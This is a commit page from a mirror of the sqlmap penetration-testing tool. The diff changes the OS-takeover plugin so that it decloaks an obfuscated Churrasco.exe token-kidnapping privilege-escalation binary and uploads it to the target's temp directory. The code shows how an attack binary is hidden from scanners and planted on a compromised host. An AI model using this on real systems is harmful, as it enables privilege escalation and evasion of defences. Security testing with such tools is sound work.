PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-06 12:41:30 +00:00
Code Issues Projects Releases Wiki Activity

added support for cloaking Churrasco.exe file

Browse Source
This commit is contained in:
Miroslav Stampar
2010-01-28 00:07:33 +00:00
parent 4559ded6c1
commit 921e449454
5 changed files with 21 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
plugins/generic/takeover.py
View File

@@ -24,7 +24,9 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import re
from tempfile import NamedTemporaryFile
from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import fileToStr
from lib.core.common import getDirs
@@ -45,7 +47,6 @@ from lib.takeover.metasploit import Metasploit
from lib.takeover.registry import Registry
from lib.techniques.outband.stacked import stackedTest
class Takeover(Abstraction, Metasploit, Registry):
"""
This class defines generic OS takeover functionalities for plugins.
@@ -66,12 +67,17 @@ class Takeover(Abstraction, Metasploit, Registry):
output = readInput(msg, default="Y")
if not output or output[0] in ( "y", "Y" ):
wFile = os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe")
tmpFile = NamedTemporaryFile()
tmpFile.write(decloak(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_")))
tmpFile.seek(0)
wFile = tmpFile.name
self.churrascoPath = "%s/sqlmapchur%s.exe" % (conf.tmpPath, randomStr(lowercase=True))
self.cmdFromChurrasco = True
self.writeFile(wFile, self.churrascoPath, "binary", confirm=False)
tmpFile.close()
return True
else: